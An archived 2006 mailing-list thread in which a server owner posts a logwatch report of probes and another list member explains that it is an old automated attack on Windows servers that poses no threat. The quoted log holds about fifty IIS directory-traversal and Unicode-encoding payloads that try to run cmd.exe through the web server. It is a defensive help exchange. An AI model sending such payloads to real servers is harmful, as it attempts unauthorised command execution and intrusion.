Article 7108 at 06/09/20 04:37:34 From: paul (at mark) planetcentral.net Subject: [coba-e:07108] Re: Concerned

Index: [Article Count Order] [Thread]
Date:  Wed, 20 Sep 2006 09:27:40 +0100
From:  "Paul" <paul (at mark) planetcentral.net>
Subject:  [coba-e:07108] Re: Concerned - anything to worry about??
To:  coba-e (at mark) bluequartz.org
Message-Id:  <20060920082721.M52647 (at mark) planetcentral.net>
In-Reply-To:  <076301c6dc85$d2a9c3e0$2600a8c0 (at mark) iml.local>
References:  <4510D8C2.1030206 (at mark) planetcentral.net> <076301c6dc85$d2a9c3e0$2600a8c0 (at mark) iml.local>
X-Mail-Count: 07108

Phew - thanks Darren - much appreciated

On Wed, 20 Sep 2006 08:24:34 +0100, Darren Wolfe wrote
> Hi Paul,
> 
> Nothing to worry about, just some automated attack script for windows
> servers (and quite an old one by the looks of it, this exploit was closed a
> long time ago IIRC).  You don't have any of these files on your server and
> even if they were they wouldn't execute anyway.
> 
> Another day in the life of a machine on the internet i'm afraid!
> 
> -----Original Message-----
> From: paul [mailto:paul (at mark) planetcentral.net] 
> Sent: 20 September 2006 07:00
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:07105] Concerned - anything to worry about??
> 
> Checked my logwatch mail this morning and found this - is it anything to 
> worry about???
> I mean i know they were looking for mostly windows files, but does this 
> mean my system's been compromised ????
> 
> Thx
> Paul
> 
>  total of 1 sites probed the server 
>   www.mydomain.net 218.92.93.181
> 
> !!!! 50 possible successful probes 
>  /cgi-bin/cmd.exe?/c+dir HTTP Response 302 
>  /bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /scripts/root.exe?/c+dir HTTP Response 302 
>  /_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/cmd32.exe?/c+dir HTTP Response 302 
>  /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302 
>  /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /Cgi-Bin/cmd32.exe?/c+dir HTTP Response 302 
>  /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /script/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/cmd.exe?/c+dir HTTP Response 302 
>  /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302 
>  /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /cgi-Bin/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302 
>  /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
>  /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302 
>  /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302 
>  /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
> 
> -- 
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.
> 
> -- 
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.


--
Open WebMail Project (http://openwebmail.org)


-- 
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.